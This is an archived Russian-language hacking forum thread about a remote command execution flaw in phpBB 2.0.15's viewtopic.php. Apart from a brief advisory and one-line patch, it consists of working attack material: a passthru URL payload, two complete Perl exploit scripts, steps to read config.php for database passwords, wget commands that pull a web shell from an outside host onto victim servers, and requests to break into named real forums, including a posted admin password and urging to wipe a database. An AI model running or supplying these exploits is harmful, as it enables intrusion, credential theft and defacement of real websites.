Просмотр полной версии : Уязвимости форумов phpbb 2.0.15
Выполнение произвольного PHP сценария в phpBB в коде highlighting
Программа: phpBB 2.0.15
Опасность: Высокая
Наличие эксплоита: Нет
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за некорректного использования функции preg_replace() в сценарии 'viewtopic.php' при обработке входных данных. Удаленный пользователь может с помощью специально сформированного запроса заставить приложение интерпретировать входные данные как PHP сценарий и выполнить его.
Учись
http://target/forum/viewtopic.php?t=243&cmd=ls&highlight='.passthru($HTTP_GET_VARS[cmd]).'
Если че найдешь то соообщи!
Незнаю, почем, но когда я выполняю его, то у меня страница грузиться намного дольше... Но на странице ничего нет, если команда "ls" выполняется невидимо, то можно было вместо "ls" поставить "rm viewtopic.php" и страница бы уже не грузилась... Но ничего не происходит!
ох уж мне этот пхпББ... =)
GreenBear
30.06.2005, 18:43
защита:
открыть viewtopic.php
найти:
$message = str_replace('\"', '"', substr(@preg_replace('#(\>(((?>([^><]+|(?R)))*)\<))#se', "@preg_replace('#\b(" . str_replace('\\', '\\\\', $highlight_match) . ")\b#i', '<span style=\"color:#" . $theme['fontcolor3'] . "\"><b>\\\\1</b></span>', '\\0')", '>' . $message . '<'), 1, -1));
заменить на:
$message = str_replace('\"', '"', substr(@preg_replace('#(\>(((?>([^><]+|(?R)))*)\<))#se', "@preg_replace('#\b(" . str_replace('\\', '\\\\', addslashes($highlight_match)) . ")\b#i', '<span style=\"color:#" . $theme['fontcolor3'] . "\"><b>\\\\1</b></span>', '\\0')", '>' . $message . '<'), 1, -1));
а еще лучшая защита - перейти на ипб или воблу. я уже. =)
vorishka
30.06.2005, 20:46
Ребята, жизнь прекрасна или я мазахист. Но ничего не получается... Помогите...
хрень какая-то..
прошёлся по сайтам, и нихрена уязвимость не сработала..
такая же тема, но мне на данный момент это не надо.
GreenBear
30.06.2005, 21:19
ХЗ, мож она и не работае :d.
я тож на се проверял - ноль. или ошибка где.
ошибка в том, видимо, кто осмелилися уязвимость на гл.странице выложить..
хотя это уже брали.. но блин.. это наверно с перепою запостил Кондор..))) шучу..)
GreenBear
30.06.2005, 21:47
ну тогда это уже не первая ошибка.... с версией 12 или 13, не помню уже, когда выложили видео как за 5 секнуд стать админом было намного.... *цензура*
вот рабочий sploit (http://forum.anonymous.ru/attachment.php?attachmentid=89) по крайней мере он работал днём!!!
по крайней мере он работал днём!!!
А че вечером он может не работать? )))
вот рабочий sploit (http://forum.anonymous.ru/attachment.php?attachmentid=89) по крайней мере он работал днём!!!
Вы лажи сюда... А то региться не охота
а как файл взять то там зарегистроваться надо! дай другой линк и что за сплойт?
этот баг работает =)) зер гуд...
как я понял, методом тыка, кол-во повторений вызываемой команды равно кол-ву постов на странице =))) так чтоб было удобней выбирайте топик, где только одно сообщение =))
vorishka
01.07.2005, 09:57
Блин понатуре выложите сюда, там нада регаться... =))) Пожалуйста!!!
GreenBear
01.07.2005, 10:04
по многочислеым просьбам трудящихся:
#!/usr/bin/perl
use IO::Socket;
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~
if (@ARGV < 4)
{
print q(################################################ ############
phpBB <=2.0.15 remote command execution exploit
by RusH security team // www.rst.void.ru
Littttttttttle modificated by nori!
r57 respect!
################################################## ##########
usage:
r57phpbb2010.pl [URL] [DIR] [NUM] [CMD]
params:
[URL] - server url e.g. www.phpbb.com
[DIR] - directory where phpBB installed e.g. /phpBB/ or /
[NUM] - number of existing topic
[CMD] - command for execute e.g. ls or "ls -la"
################################################## ##########
);
exit;
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$topic = $ARGV[2];
$cmd = $ARGV[3];
$serv =~ s/(http:\/\/)//eg;
print "*** CMD: [ $cmd ]\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
$cmd=~ s/(.*);$/$1/eg;
$cmd=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$topic=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$path = $dir;
$path .= 'viewtopic.php?t=';
$path .= $topic;
$path .= '&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20';
$path .= $cmd;
$path .= '%3B%20%65%63%68%6F%20%5F%45%4E%44%5F';
$path .= '&highlight=%27.%70%61%73%73%74%68%72%75%28%24%48%54 %54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5 D%29.%27';
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] CONNECT FAILED\r\n";
print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
$on = 0;
while ($answer = <$socket>)
{
if ($answer =~ /^_END_/) { print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; exit(); }
if ($on == 1) { print " $answer"; }
if ($answer =~ /^_START_/) { $on = 1; }
}
print "[-] EXPLOIT FAILED\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
### EOF ###
все спасибо ввиде повышения репутации :D
это сплойт Раш Тимы на 2.0.10 в переделанном виде ))
щас попробоую...))
SK | Heaton
02.07.2005, 10:18
r57phpbb2010.pl [URL] [DIR] [NUM] [CMD]
надо компилировать код пот названием r57phpbb2010.pl ?!
Здарова народ. Я тут новинький :)
Чёта я куда небюсь этим сплойтом, мне все выдает "Exploit failed" У ковонить он нормально работает?
GreenBear
02.07.2005, 13:12
да, у меня.
И у меня, всё работает на ура!!!
я ввожу "phpbb.pl 192.168.140.14 / 459 "ls -la"
форум пропачен до 2.0.15 причем криво, с хакера сплоит пробивает но он какой то странный. Это тоже канает (http://target/forum/viewtopic.php?t=243&cmd=ls&highlight='.passthru($HTTP_GET_VARS[cmd]).')
кстати, как спомощью этого /\/\/\ грузануть файл на сервак?
у меня тоже это сплойт работал только тогда когда он вышел в свет))) а щас все время файлед...
>>надо компилировать код пот названием r57phpbb2010.pl ?!
вы что не понимаете что ПЕРЛ СКРИПТЫ не компилят??
GreenBear
02.07.2005, 23:54
дык я думаю против такой баги даже самые ленивые админы обновляют форумы.
Dragunov
03.07.2005, 13:24
&cmd=ls&highlight='.passthru($HTTP_GET_VARS[cmd]).'
Воспользовался вот этой темой...
admin cache common.php config.php db docs extension.inc faq.php groupcp.php images includes index.php language login.php memberlist.php modcp.php posting.php privmsg.php profile.php search.php templates viewforum.php viewonline.php viewtopic.php admin cache common.php config.php db docs extension.inc faq.php groupcp.php images includes index.php language login.php memberlist.php modcp.php posting.php privmsg.php profile.php search.php templates viewforum.php viewonline.php viewtopic.php admin cache common.php config.php db docs extension.inc faq.php groupcp.php images includes index.php language login.php memberlist.php modcp.php posting.php privmsg.php profile.php search.php templates viewforum.php viewonline.php viewtopic.php admin cache common.php config.php db docs extension.inc faq.php groupcp.php images includes index.php language login.php memberlist.php modcp.php posting.php privmsg.php profile.php search.php templates viewforum.php viewonline.php viewtopic.php admin cache common.php config.php db docs extension.inc faq.php groupcp.php images includes index.php language login.php memberlist.php modcp.php posting.php privmsg.php profile.php search.php templates viewforum.php viewonline.php viewtopic.php
Получил данное сообщение.
Обясните ламеру что делать дальше? Как получить пароли от форума и.т.п.?
Dragunov
03.07.2005, 13:39
Пожалуйста помогите)) Введите в курс дела...объясните че за сплойт)) ПОжалуйста!
Dragunov, максимум что ты получишь - пароли от БД. =))
их получаешь из следующей команды:
viewtopic.php?t=123[вместо 123 подставляешь свой номер топика]&cmd=cat%20config.php&highlight='.passthru($HTTP_GET_VARS[cmd]).'
Запустил? Ничего не появилось?:)) Правильно)). Далее просмотри html-сорс странички и ты наткнёшься там на примерно это:
<?php
$dbms = 'mysql';
$dbhost = 'localhost';
$dbname = '*********';
$dbuser = '*******';
$dbpasswd = '*****';
$table_prefix = 'phpbb_';
define('PHPBB_INSTALLED', true);
?>
Вместо звёздочек, понятное дело, будут данные.. вот их и юзай. попробуй для ФТП попробовать логин и пароль.
для заливки шелла юзаем команду wget. Синаксис:
wget http://shell.narod.ru/shell.php
Пишем это дело в cmd в урле.
Даливайте шелл только в ту папку, куда позволяют права. Чтобы узнать какие права в папочке, юзайте команду ls -la.
cmd=ls -la;wget http:// ....
вот приблизительно так должно получиться)).
Переходить в др. директории командой cd.
зы: можно писать несколько команд через точку с запятой.
Dragunov
03.07.2005, 14:36
Я грю)) Я конкретный ламер) ЧТо такое шелл?
нда...
шелл - оболочка для удалённых команд, грубо говоря..)
иди на php.spb.ru/remview/
и качай remview.php . Это и есть шелл.
его и будешь заливать, только сначала зарегь сайт на народе и туда залей шелл. потом будешь к нему обращаться... С тебя 5 баксов =)).
Dragunov
03.07.2005, 15:16
Не качает...пишет архив битый...
не может быть такого...
http://php.spb.ru/remview/remview_2003_10_23.zip
всё нормал качает
Dragunov
03.07.2005, 15:51
Можешь дать номер своей аськи?
Нет
Пиши в ПМ, если что-то беспокоит..
Такое дело. Шелл вроде я залил,
rw-r--r-- 1 u3603347 ftpusers 43265 Jun 30 17:38 search.php
rw-r--r-- 1 u3603347 ftpusers 0 Jul 4 14:32 shell.php
rw-r--r-- 1 u3603347 ftpusers 2958 Jul 4 14:32 shell.php.1
rw-r--r-- 1 u3603347 ftpusers 2958 Jul 4 14:32 shell.php.2
rw-r--r-- 1 u3603347 ftpusers 2958 Jul 4 14:32 shell.php.3
rw-r--r-- 1 u3603347 ftpusers 2958 Jul 4 14:32 shell.php.4
rw-r--r-- 1 u3603347 ftpusers 2958 Jul 4 14:32 shell.php.5
rwxr-xr-x 6 u3603347 ftpusers 4096 Jun 30 17:38 templates
rw-r--r-- 1 u3603347 ftpusers 5 Jul 4 01:26 test.txt
rw-r--r-- 1 u3603347 ftpusers 691 Nov 21 2004 update.php
rw-r--r-- 1 u3603347 ftpusers 23154 Oct 19 2004 viewforum.php
rw-r--r-- 1 u3603347 ftpusers 7233 May 9 19:42 viewonline.php
rw-r--r-- 1 u3603347 ftpusers 45228 May 9 19:42 viewtopic.php
Использую Putty чтоб подконектиться, а он мне Access Denied. Что ж может быть не так?
Dragunov, максимум что ты получишь - пароли от БД. =))
их получаешь из следующей команды:
viewtopic.php?t=123[вместо 123 подставляешь свой номер топика]&cmd=cat%20config.php&highlight='.passthru($HTTP_GET_VARS[cmd]).'
Запустил? Ничего не появилось?:)) Правильно)). Далее просмотри html-сорс странички и ты наткнёшься там на примерно это:
<?php
$dbms = 'mysql';
$dbhost = 'localhost';
$dbname = '*********';
$dbuser = '*******';
$dbpasswd = '*****';
$table_prefix = 'phpbb_';
define('PHPBB_INSTALLED', true);
?>
Вместо звёздочек, понятное дело, будут данные.. вот их и юзай. попробуй для ФТП попробовать логин и пароль.
для заливки шелла юзаем команду wget. Синаксис:
wget http://shell.narod.ru/shell.php
Пишем это дело в cmd в урле.
Даливайте шелл только в ту папку, куда позволяют права. Чтобы узнать какие права в папочке, юзайте команду ls -la.
cmd=ls -la;wget http:// ....
вот приблизительно так должно получиться)).
Переходить в др. директории командой cd.
зы: можно писать несколько команд через точку с запятой.
Привет, у меня немного по-другому исчезает само сообщение на странице т.е там где текст ничего нету, но в сорсе кода тоже ничего не отображает, в чем может быть дело ?
Azazel, а ты права доступа взглянул??:)) Видимо, нет..
rwxr-xr-x - недостаточно прав..
про другие я и не говорю..
Felix, ну ты проверь сначала, работает ли сама бага.. если да, то вышеуказанный пример точно должен быть =). Ведь ты всего лишь просматриваешь файл.. и содерживое в нём должно просматриваться..!
Azazel, а ты права доступа взглянул??:)) Видимо, нет..
rwxr-xr-x - недостаточно прав..
про другие я и не говорю..
Felix, ну ты проверь сначала, работает ли сама бага.. если да, то вышеуказанный пример точно должен быть =). Ведь ты всего лишь просматриваешь файл.. и содерживое в нём должно просматриваться..!
Походу уязвим т.к когда я начинаю задавать какие либо параметры, от форума остается только шапка, но ничего не выполняется и следовательно не выводиться тоже как быть, мот кто встречал ??
vorishka
07.07.2005, 22:06
Я вот пишу: _http://saitik/forum/viewtopic.php?t=7&highlight=%27.passthru($HTTP_GET_VARS[cmd]).%27&cmd=ls ../../;ls%20-la Он не показывает права на папки, что не так? Да и где-то читал, что нада посмореть качалку, которая стоит на сайте, как и где это зделать?
надо прописовать параметры -la:
ls ../../ -la;
тогда будет с правами.
>>Использую Putty чтоб подконектиться, а он мне Access Denied. Что ж может быть не так?
=))))))))) лооооол это веб шел...набивай адрес в урл
vorishka
08.07.2005, 00:09
надо прописовать параметры -la:
ls ../../ -la;
тогда будет с правами.
А не прокатывает =( Выдает вот так:
../../:
cgi-bin
cgi-bin-dist
data
data-dist
error
error-dist
icons
icons-dist
И всё... ну что ещё мона зделать...
tester2005
08.07.2005, 03:38
Такое дело. Шелл вроде я залил,......
Использую Putty чтоб подконектиться, а он мне Access Denied. Что ж может быть не так?
ГЫ: ага прям он те ща на тарелочке с добавкой =)
Что не так??...то шо ты залил, это веб-шелл а не шелл по ssh....
хошь консольный получить, то прибинди порт, и коннекться...а как дальше, то читай книжки =)
ГЫ: ага прям он те ща на тарелочке с добавкой =)
Что не так??...то шо ты залил, это веб-шелл а не шелл по ssh....
хошь консольный получить, то прибинди порт, и коннекться...а как дальше, то читай книжки =)
кстати, если конектишся паттей по ssh без всяких там соксификаторов, то 4ей айпи будет в логах серванта, мой, или прокси, указанной в ослике??? Это так, 4тобы не спалиться лишний раз...
И у меня, всё работает на ура!!!
Покажи пример твоего запроса...
Всмысле че ты в командной строке писал
tester2005
08.07.2005, 08:47
кстати, если конектишся паттей по ssh без всяких там соксификаторов, то 4ей айпи будет в логах серванта, мой, или прокси, указанной в ослике??? Это так, 4тобы не спалиться лишний раз...
Патти к ослу никак не относитса, так что взаимосвязки настроек прокситса настройками бровзера там нет, хотя не проверял...
Так что используй proxycap или proxifier которые туннелируют все твои исходяшие с машини коннекты...
и ваще это уже оффтоп, сдесь обсуждаетса эксплотация дыры в 2.0.15 а не добыча шелла на сервер
воришка что за команды ты там мутишь??чтобы с правами показывалось надо всего лишь так написать: ls -la
vorishka
08.07.2005, 15:39
воришка что за команды ты там мутишь??чтобы с правами показывалось надо всего лишь так написать: ls -la
viewtopic.php?t=7&highlight=%27.passthru($HTTP_GET_VARS[cmd]).%27&cmd=ls%20../../%20-la. Т.е. выходим на 2 каталога выше, и сморим права. Не отображается тока папки. Пишем ls%20../../%20;la, тоже.... ls%20../../%20;-la тоже...
Чё делать то может на какой сайтик дадите пример?
а ты попробуй просто ls -la написать )) может так получится?
Просьба такая, зделайте кто-то маленький гуид по лодерам (wget, curl).Плиз и как узнать где они стоят или вообше стоят ли. Плиззз
Они должны стоят. Та качалка(wget) или другая (curl)!
не хочу зоздавать новую тему просто отпишусь тут
на этом форуме www.hpforum.ru админ просто ...... его пасс gegcde и действуют все дыры, ему 2 недели назад посылали письмо о том как их закрыть а он говорит что типа и слышать об этом не хочет!!! короче там xss досихпор висит моно посмотреть через оперу в теме http://www.hpforum.ru/viewtopic.php?t=2&start=300 под ником exbb
>>Просьба такая, зделайте кто-то маленький гуид по лодерам (wget, curl).Плиз и как узнать где они стоят или вообше стоят ли. Плиззз
а зачем гуид?пишешь wget ili curl ili fetch ili lynx и смотришь какая сработает..
exbb прочитал =) идиоты ... а ты возьми грохни базу..задефейсни на фиг..че ты еще оправдывашься перед ними
да не хочу просто уже связыватся пусть кто другой тренируется
пишешь wget ili curl ili fetch ili lynx и смотришь какая сработает..
Глупость однако.
which wget
which curl
which lynx
which fetch
wget --help
curl --help
lynx --help
fetch --help
Вот тебе и все параметры.
Как мне поменять права доступа.
Закачиваю шелл wget'ом и нихрена. :confused:
Глупость однако.
Согласен=)ступил)))))))
Как мне поменять права доступа.
командой chmod
такой вопросик где мона скачать эксплоит для phpbb 2.0.15
Помогите пожалуйста ламеру
Второй день пытаюсь ломануть http://mariel.ru/forum Через кук не получается, внизу
сылка на админку есть, а ник админа не уводится. На форуме 3 админа.
m0nzt3r, Нужно цифрами вводить права доступа?
TIMaN, А я вобще этого сайта не вижу. :confused:
stalles, Я юзаю такой.
#!/usr/bin/perl
# Wed Jun 29 19:08:04 CEST 2005 dab@digitalsec.net
#
# phpBB 2.0.15 -re-bug in viewtopic.php
# The complete Open Source Development with CVS: GNU General Public License
# Book on using CVS effectively <--------- cvs, is also GPL
# or http://www.google.es/search?q=programming+howto
#
# BLINK! BLINK! BLINK! *** BRUTEFORCE CAPABILITIES *** BLINK! BLINK! BLINK!
#
#
# Example: ./phpbb2_0_15.pl http://www.server.com/viewtopic.php?t=1
# You can start typing commands.
# Tested in BSD. Theo.. it works!
#
# !dSR: que todos los hackers digan YO!!
#
#
use strict;
use IO::Socket;
unless ($ARGV[0]) { print "$0 <viewtopic url>\n"; exit(1); }
$ARGV[0] =~ m!http://(.*?)/(.*?t=\d+)!;
my ($server, $port) = split (/:/,$1);
$port = 80 unless defined($port);
$server = $1 unless defined($server);
my ($url, $command) = $2;
print "$server - $port - $url\n";
while () {
print "phpBB2.0.15> ";
while(<STDIN>) {
$command=$_;
chomp($command);
last;
}
&send($command);
}
sub send {
my $ok = 0;
my $cmd = "echo \"#PHPBBEXPLOIT#\";".$_[0].";echo \"#PHPBBEXPLOIT#\"";
my $string = "GET /$url&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.1\n".
"Host: $server\nPHP: $cmd\n\n\n\n";
my $socket = IO::Socket::INET->new(PeerAddr => $server,
PeerPort => $port,
Proto => "tcp",
Type => SOCK_STREAM)
or die "can't connect to: $server : $@\n";
print $socket $string;
while(<$socket>) {
if (/#PHPBBEXPLOIT#/) {
close($socket) and last if $ok eq 2;
$ok++;
next;
}
print if $ok eq "1";
}
}
и чё с этим кодом делать? его нада компелить? видь на перле некомпелится!
GreenBear
22.07.2005, 09:51
молица на этот код надо. писец =))
береш... копируеш... сохроняешь файл в *.pl...
в cmd пишеш путь к нему... путь к форуму... с топиком... например
http://www.server.com/viewtopic.php?t=1 дальше делаеш то что надо на сервере. можеш шел закачать для удобсва...
да, прежде чем делать, активперл установи -)
m0nzt3r, Нужно цифрами вводить права доступа?
да , надо
Люди, как ломать форум на движке PHPbb ??? То что эксплойта там не надо я уже понял... Де можно взять программу PHPbb??? Спасибо.
Извиняюсь, неправильно сылку написал
http://www.mariel.ru/forum/
самы ломаемый форум это пхпбб а ты спрашиваешь как =))))))))))))))))))
GreenBear
22.07.2005, 12:33
мне кажеца надо модерам удялть сообщения, по типу таких, как пишет тиман. а обычным юзверям игнорировать их. если людям влом тему прочитать, то это уже их проблемы.
Я научился ломать форумы эксплойерам, теперь хочу познать искуство взлома форумов на движке РНРbb. Мне нужна помощ. Кто нибудь поможет? Научит? А я пока пойду видео качну. Объясните если не жалко.
Но Феар по любому все ломают эксплойерами))
а так вручную хочешь?иди на секлаб поиск пхпбб ... еще вот Задохлик недавно хсс опубликовал...вот это можно вручную а не эксплойерами))))
GreenBear
22.07.2005, 17:10
в мозге.
Извиняюсь, неправильно сылку написал
http://www.mariel.ru/forum/
Я бы попробывал бы сплойтом bbsh.exe , потом для версии 2,0,6 (см.видео) потом для 2,0,13 с подменой куков .
Я бы попробывал бы сплойтом bbsh.exe , потом для версии 2,0,6 (см.видео) потом для 2,0,13 с подменой куков .
Чет не выходит :( пишет:
_ nom du cookie recuperer : phpbb2mysql
_ SESSION ID recuperщ ... 70341aa785acbaa75ceda29eac9bddda
http://mariel.ru/forum/?sid=70341aa785acbaa75ceda29eac9bddda
_ recuperation du nom de la table sql ... can't find
Пробовал ломануть через кук (видио Winux'a) внизу сылка на админку есть, а ник админа не уводит
Пробовал через XSS, всталяю кук и тож ничего не происходит
T-REXу и др.
Что касается сплойта, че-то не выходит...
C:\>D:\usr\bin\perl.exe phpbb2.0.15.pl http://www.devichnik.ru/forums/viewtopic.php?t
=31616
www.devichnik.ru - 80 - forums/viewtopic.php?t=31616
phpBB2.0.15> ls -la
phpBB2.0.15>
и дальше тишина...
админку есть, а ник админа не уводит
Что значит не уводит ?
Ты в админку входиш там товй ип или прокся српава , а слева выделен админ и его логин .
Что значит не уводит ?.
В видео показано, что когда обновляешь, то заходишь под ником админа. А у меня написано "Вход". Я как-бы вылетаю.
А внизу сылка на админку, чтоб в неё войти требуется ввести логин и пароль админа
и дальше тишина...
перевожу: форум не дырявый
m0nzt3r
Понял, спасибо ! Я думал в сплойте ошибки.
No fear
Так впереди же привели исходники на перле. Даже два. Установи ActivePerl-5.8.6.811-MSWin32-x86-122208 и пробуй ! Почитай сначала help.
T-REXу и др.
Что касается сплойта, че-то не выходит...
C:\>D:\usr\bin\perl.exe phpbb2.0.15.pl http://www.devichnik.ru/forums/viewtopic.php?t
=31616
www.devichnik.ru - 80 - forums/viewtopic.php?t=31616
phpBB2.0.15> ls -la
phpBB2.0.15>
и дальше тишина...
Тишина?
Должно всё быть, проверь, не пропатчили форум.
T-REXу
А как проверить: пропатчили его или нет ?
У меня по форумам опыта мало, но с IPB как не странно все получилось - главное чтоб
сплойт работал !!!
Попробовал еще штук 5 phpBB 2.0.15 - то же самое (не робит).
VARVAR, ну проверь ещё раз на уязвимость. Админы на месте не сидят.
Нихрена не выходит.
Сначала я создал каталог (mkdir shellys ), потом я поменял на него права (chmod 777 shellys ), перехожу в shellys с cd и заливаю туда шелл.
Нихрена он туды не заливается. :mad:
Нихрена он туды не заливается
Ты права менял не с nobody?
Бывают и такие...)) Ты сначала посмотри свои права то...
И че ты шелл заливал? Уж не wgetом ли?
Проверь сначала, есть ли он вообще.
Права менял просто chmod'ом.
Свои права? Яж создал папку с 777 правами.
Как раз wgetom, он есть ибо хелп к нему есть(наверно глупо?).
Сказать могу одно, у меня точно такой же геморой, как и у чувака из видео (он там ещё по ICQ базарил :)).
он про твои права в системе =) id
он про твои права в системе =) id
Там написано uid=34951(site) gid=200(virthost) groups=200(virthost) Что это значит?
Хто-то поскажет что моно делать с куками?
Хто-то поскажет что моно делать с куками?
На стенку повесить :)
На стенку повесить
жутко содержательно
У меня вопррос все сработало , выдало следущее
drwxr-xr-x 10 test wwwusers 1024 May 18 15:10 .
drwxr-x--- 11 test wwwusers 512 Jun 17 12:02 ..
drwxr-xr-x 2 test wwwusers 1024 May 14 01:04 admin
drwxr-xr-x 2 test wwwusers 512 Mar 11 17:34 cache
-rw-r--r-- 1 test wwwusers 6726 Feb 27 20:30 common.php
-rw-r--r-- 1 test wwwusers 249 Mar 18 18:39 config.php
drwxr-xr-x 2 test wwwusers 512 May 14 01:04 db
drwxr-xr-x 2 test wwwusers 512 Mar 11 17:34 docs
-rw-r--r-- 1 test wwwusers 810 Feb 27 20:30 extension.inc
-rw-r--r-- 1 test wwwusers 3643 Feb 27 20:30 faq.php
-rw-r--r-- 1 test wwwusers 45673 May 14 01:04 groupcp.php
drwxr-xr-x 4 test wwwusers 1024 Feb 27 22:30 images
drwxr-xr-x 2 test wwwusers 1024 May 14 01:04 includes
-rw-r--r-- 1 test wwwusers 14515 Feb 27 20:30 index.php
drwxr-xr-x 4 test wwwusers 512 May 14 01:04 language
-rw-r--r-- 1 test wwwusers 7748 May 14 01:04 login.php
-rw-r--r-- 1 test wwwusers 12150 Feb 27 20:30 memberlist.php
-rw-r--r-- 1 test wwwusers 37796 May 14 01:04 modcp.php
-rw-r--r-- 1 test wwwusers 34445 May 14 01:04 posting.php
-rw-r--r-- 1 test wwwusers 72541 May 14 01:04 privmsg.php
-rw-r--r-- 1 test wwwusers 3947 Feb 27 20:30 profile.php
-rw-r--r-- 1 test wwwusers 43265 May 14 01:04 search.php
drwxr-xr-x 4 test wwwusers 512 May 18 11:37 templates
-rw-r--r-- 1 test wwwusers 23154 Feb 27 20:30 viewforum.php
-rw-r--r-- 1 test wwwusers 7233 May 14 01:04 viewonline.php
-rw-r--r-- 1 test wwwusers 45228 May 14 01:04 viewtopic.php
пытался залить в templates wget http://sanyax.narod.ru/remview.php -o /temlates и ничего не закачивается и просто wget http://sanyax.narod.ru/remview.php и curl и lynx , подскажите что не так , я плохо разбираюсь в правах на папки может туда запрещено ?
phpBB <= 2.0.15 remote command execution exploit
by Captain Crunch Security TeaM // www.ccteam.ru or ccteam.nukleon.us
Thanks to nukleon, nori, r57. This programm just for fun! Coded by tristram.
################################################## ##########
Usage:
c99expl.phpbb2015-interactive.php [URL] [NUM] [CMD]
params:
[URL] - URL to directory where phpBB installed e.g. http://host.tld/phpBB/ or
http://host.tld/
[NUM] - number of existing topic (e.g. 10)
[CMD] - command for execute e.g. ls or "ls -la"
c99expm.phpbb2015.php http://host.tld/phpBB/ 10 ls
################################################## ##########
Enter URL: http://forum.****.lv
Enter Topic-ID: 2
Enter CMD: ls -la
Initialization exploit... OK
Processing parameters...
URL: http://forum.****.lv
HOST: forum.*****.lv
PATH:
PORT: 80
Topic-ID: 2
Execution "ls -la" result:
+%3Bls+-la%3B+echo+
bash $
помогите... почему у меня не выдает список? вроде экс. работает...
Не подскажите точную версию...уже запарился перебирать =\
http://www.taultunleashed.com/phpbb2
phpBB 2.0
The phpBB Group : 2002
phpBB 2.0
The phpBB Group : 2002
То что это 2.0 то я понял \=) вот какая это 2.0.*...13, 14, 15 , 16...вот в этом вопрос.
bogusz
исходи из того, что версия до 2.0.3 =)
т.к. в 2002 году вышло только 2.0.0, 2.0.1, 2.0.2 и 2.0.3 =)
по многочислеым просьбам трудящихся:
#!/usr/bin/perl
use IO::Socket;
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~
if (@ARGV < 4)
{
print q(################################################ ############
phpBB <=2.0.15 remote command execution exploit
by RusH security team // www.rst.void.ru
Littttttttttle modificated by nori!
r57 respect!
################################################## ##########
usage:
r57phpbb2010.pl [URL] [DIR] [NUM] [CMD]
params:
[URL] - server url e.g. www.phpbb.com
[DIR] - directory where phpBB installed e.g. /phpBB/ or /
[NUM] - number of existing topic
[CMD] - command for execute e.g. ls or "ls -la"
################################################## ##########
);
exit;
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$topic = $ARGV[2];
$cmd = $ARGV[3];
$serv =~ s/(http:\/\/)//eg;
print "*** CMD: [ $cmd ]\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
$cmd=~ s/(.*);$/$1/eg;
$cmd=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$topic=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$path = $dir;
$path .= 'viewtopic.php?t=';
$path .= $topic;
$path .= '&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20';
$path .= $cmd;
$path .= '%3B%20%65%63%68%6F%20%5F%45%4E%44%5F';
$path .= '&highlight=%27.%70%61%73%73%74%68%72%75%28%24%48%54 %54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5 D%29.%27';
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] CONNECT FAILED\r\n";
print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
$on = 0;
while ($answer = <$socket>)
{
if ($answer =~ /^_END_/) { print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; exit(); }
if ($on == 1) { print " $answer"; }
if ($answer =~ /^_START_/) { $on = 1; }
}
print "[-] EXPLOIT FAILED\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
### EOF ###
все спасибо ввиде повышения репутации :D
дОБРОЕ ВРЕМЯ СУТОК!Не подскажите,в чем дело?
после ввода выдает:
*** CMD: [ [ls -la] ]
~~~~~~~~~~~~~~~~
[-] CONNECT FAILED
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot